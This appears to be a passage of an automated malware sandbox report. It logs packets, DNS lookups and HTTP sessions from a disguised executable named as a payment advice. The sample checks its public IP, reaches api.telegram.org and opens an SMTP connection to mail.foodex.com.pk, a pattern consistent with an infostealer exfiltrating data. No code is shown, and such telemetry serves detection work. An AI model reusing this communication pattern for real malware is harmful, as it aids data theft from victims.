                                                                                                                                        Nov 16, 2024 16:51:24.205102921 CET44351076188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:24.205301046 CET44351076188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:24.205502033 CET51076443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:24.205883980 CET51076443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:24.210468054 CET5107580192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:24.211940050 CET5107780192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:24.215898037 CET8051075158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:24.216095924 CET5107580192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:24.216924906 CET8051077158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:24.217010975 CET5107780192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:24.217120886 CET5107780192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:24.222135067 CET8051077158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:25.112025976 CET8051077158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:25.113881111 CET51078443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:25.113976002 CET44351078188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:25.114228964 CET51078443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:25.114720106 CET51078443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:25.114770889 CET44351078188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:25.154552937 CET5107780192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:25.723787069 CET44351078188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:25.726223946 CET51078443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:25.726315975 CET44351078188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:25.870665073 CET44351078188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:25.870829105 CET44351078188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:25.871107101 CET51078443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:25.871651888 CET51078443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:25.876631021 CET5107780192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:25.878222942 CET5107980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:25.881886959 CET8051077158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:25.881967068 CET5107780192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:25.883105040 CET8051079158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:25.883188009 CET5107980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:25.883302927 CET5107980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:25.888205051 CET8051079158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:26.523466110 CET8051079158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:26.525140047 CET51080443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:26.525197029 CET44351080188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:26.525425911 CET51080443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:26.525674105 CET51080443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:26.525701046 CET44351080188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:26.576278925 CET5107980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:27.148324013 CET44351080188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.150336981 CET51080443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:27.150382042 CET44351080188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.297992945 CET44351080188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.298192978 CET44351080188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.298444986 CET51080443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:27.327302933 CET51080443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:27.331484079 CET5107980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:27.332583904 CET5108180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:27.337248087 CET8051079158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.337451935 CET5107980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:27.337485075 CET8051081158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.337552071 CET5108180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:27.337636948 CET5108180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:27.342406988 CET8051081158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:27.984122038 CET8051081158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.019134045 CET51082443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:28.019180059 CET44351082188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.019282103 CET51082443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:28.019648075 CET51082443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:28.019690990 CET44351082188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.029416084 CET5108180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:28.631546021 CET44351082188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.633563995 CET51082443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:28.633608103 CET44351082188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.771872997 CET44351082188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.772051096 CET44351082188.114.97.3192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.772356987 CET51082443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:28.772748947 CET51082443192.168.2.5188.114.97.3
                                                                                                                                        Nov 16, 2024 16:51:28.820822954 CET5108180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:28.826132059 CET8051081158.101.44.242192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.826201916 CET5108180192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:28.829417944 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:28.829456091 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.829524040 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:28.830085993 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:28.830101967 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.674854040 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.674978018 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:29.677550077 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:29.677558899 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.677959919 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.679718971 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:29.727328062 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.920450926 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.920594931 CET44351083149.154.167.220192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:29.920677900 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:29.924747944 CET51083443192.168.2.5149.154.167.220
                                                                                                                                        Nov 16, 2024 16:51:35.588854074 CET5106980192.168.2.5158.101.44.242
                                                                                                                                        Nov 16, 2024 16:51:35.905664921 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:35.910789967 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:35.913348913 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:36.903776884 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:36.904170990 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:36.909475088 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.156805038 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.158248901 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:37.163191080 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.410407066 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.411195993 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:37.416707039 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.711673975 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.712052107 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:37.717178106 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.964631081 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:37.965051889 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:37.970184088 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.233315945 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.233643055 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:38.239176035 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.486479998 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.487504959 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:38.487504959 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:38.487561941 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:38.487586021 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:38.487607956 CET51084587192.168.2.537.27.123.72
                                                                                                                                        Nov 16, 2024 16:51:38.492645979 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.492669106 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.492685080 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.492758036 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:38.492770910 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:39.065809011 CET5875108437.27.123.72192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:39.123308897 CET51084587192.168.2.537.27.123.72
                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Nov 16, 2024 16:50:23.364720106 CET53550571.1.1.1192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:11.033442974 CET5482753192.168.2.51.1.1.1
                                                                                                                                        Nov 16, 2024 16:51:12.194088936 CET5253153192.168.2.51.1.1.1
                                                                                                                                        Nov 16, 2024 16:51:15.169121027 CET5284453192.168.2.51.1.1.1
                                                                                                                                        Nov 16, 2024 16:51:15.177113056 CET53528441.1.1.1192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:16.302436113 CET5660153192.168.2.51.1.1.1
                                                                                                                                        Nov 16, 2024 16:51:16.310199976 CET53566011.1.1.1192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:28.821724892 CET4985553192.168.2.51.1.1.1
                                                                                                                                        Nov 16, 2024 16:51:28.828788042 CET53498551.1.1.1192.168.2.5
                                                                                                                                        Nov 16, 2024 16:51:35.828573942 CET6540953192.168.2.51.1.1.1
                                                                                                                                        Nov 16, 2024 16:51:35.903033972 CET53654091.1.1.1192.168.2.5
                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                        Nov 16, 2024 16:51:11.033442974 CET192.168.2.51.1.1.10x859eStandard query (0)api.onedrive.comA (IP address)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:12.194088936 CET192.168.2.51.1.1.10x2e0bStandard query (0)fa3hwa.dm.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:15.169121027 CET192.168.2.51.1.1.10xe7b7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:16.302436113 CET192.168.2.51.1.1.10x5542Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:28.821724892 CET192.168.2.51.1.1.10x945Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:35.828573942 CET192.168.2.51.1.1.10x4afdStandard query (0)mail.foodex.com.pkA (IP address)IN (0x0001)false
                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                        Nov 16, 2024 16:51:11.043751001 CET1.1.1.1192.168.2.50x859eNo error (0)api.onedrive.comcommon-afdrk.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:11.043751001 CET1.1.1.1192.168.2.50x859eNo error (0)common-afdrk.fe.1drv.comodc-commonafdrk-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:12.259488106 CET1.1.1.1192.168.2.50x2e0bNo error (0)fa3hwa.dm.files.1drv.comdm-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:12.259488106 CET1.1.1.1192.168.2.50x2e0bNo error (0)dm-files.fe.1drv.comodc-dm-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:15.177113056 CET1.1.1.1192.168.2.50xe7b7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:15.177113056 CET1.1.1.1192.168.2.50xe7b7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:15.177113056 CET1.1.1.1192.168.2.50xe7b7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:15.177113056 CET1.1.1.1192.168.2.50xe7b7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:15.177113056 CET1.1.1.1192.168.2.50xe7b7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:15.177113056 CET1.1.1.1192.168.2.50xe7b7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:16.310199976 CET1.1.1.1192.168.2.50x5542No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:16.310199976 CET1.1.1.1192.168.2.50x5542No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:28.828788042 CET1.1.1.1192.168.2.50x945No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:35.903033972 CET1.1.1.1192.168.2.50x4afdNo error (0)mail.foodex.com.pkfoodex.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Nov 16, 2024 16:51:35.903033972 CET1.1.1.1192.168.2.50x4afdNo error (0)foodex.com.pk37.27.123.72A (IP address)IN (0x0001)false
                                                                                                                                        • reallyfreegeoip.org
                                                                                                                                        • api.telegram.org
                                                                                                                                        • checkip.dyndns.org
                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        0192.168.2.551066158.101.44.242806256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Nov 16, 2024 16:51:15.186537027 CET151OUTGET / HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Nov 16, 2024 16:51:15.831510067 CET323INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:15 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 106
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Pragma: no-cache
                                                                                                                                        X-Request-ID: 2b604c40664c745ad194bba0d4b5b3ec
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>
                                                                                                                                        Nov 16, 2024 16:51:15.835869074 CET127OUTGET / HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                        Nov 16, 2024 16:51:15.983059883 CET323INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:15 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 106
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Pragma: no-cache
                                                                                                                                        X-Request-ID: 174cf367da2a4c55542b2ccd1c8cfa90
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>
                                                                                                                                        Nov 16, 2024 16:51:17.133250952 CET127OUTGET / HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                        Nov 16, 2024 16:51:17.281337023 CET323INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:17 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 106
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Pragma: no-cache
                                                                                                                                        X-Request-ID: d301abba013a445b9d6bd843b897bf08
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        1192.168.2.551069158.101.44.242806256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Nov 16, 2024 16:51:18.046087027 CET127OUTGET / HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                        Nov 16, 2024 16:51:18.684346914 CET323INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:18 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 106
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Pragma: no-cache
                                                                                                                                        X-Request-ID: a8f33eaee868a84cefbd72596201a3f7
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        2192.168.2.551071158.101.44.242806256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Nov 16, 2024 16:51:19.470623016 CET151OUTGET / HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Nov 16, 2024 16:51:20.201165915 CET323INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:20 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 106
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Pragma: no-cache
                                                                                                                                        X-Request-ID: 82f7aba3642fe839f8bc4af2bba48e80
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        3192.168.2.551073158.101.44.242806256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Nov 16, 2024 16:51:20.965598106 CET151OUTGET / HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Nov 16, 2024 16:51:21.615936041 CET323INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:21 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 106
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Pragma: no-cache
                                                                                                                                        X-Request-ID: 8b406d12e9326df02f3d7d8c29e86cdb
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        4192.168.2.551075158.101.44.242806256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Nov 16, 2024 16:51:22.802042961 CET151OUTGET / HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Nov 16, 2024 16:51:23.446093082 CET323INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:23 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 106
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Pragma: no-cache
                                                                                                                                        X-Request-ID: 9bf3fa78514816169e5f06ec53445089
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        5192.168.2.551077158.101.44.242806256C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Nov 16, 2024 16:51:24.217120886 CET151OUTGET / HTTP/1.1
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                        Host: checkip.dyndns.org
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Nov 16, 2024 16:51:25.112025976 CET323INHTTP/1.1 200 OK
                                                                                                                                        Date: Sat, 16 Nov 2024 15:51:25 GMT
                                                                                                                                        Content-Type: text/html
                                                                                                                                        Content-Length: 106
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Pragma: no-cache
                                                                                                                                        X-Request-ID: b3aa7b985787a2ce3c85a1043d1c4c12
                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.69</body></html>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
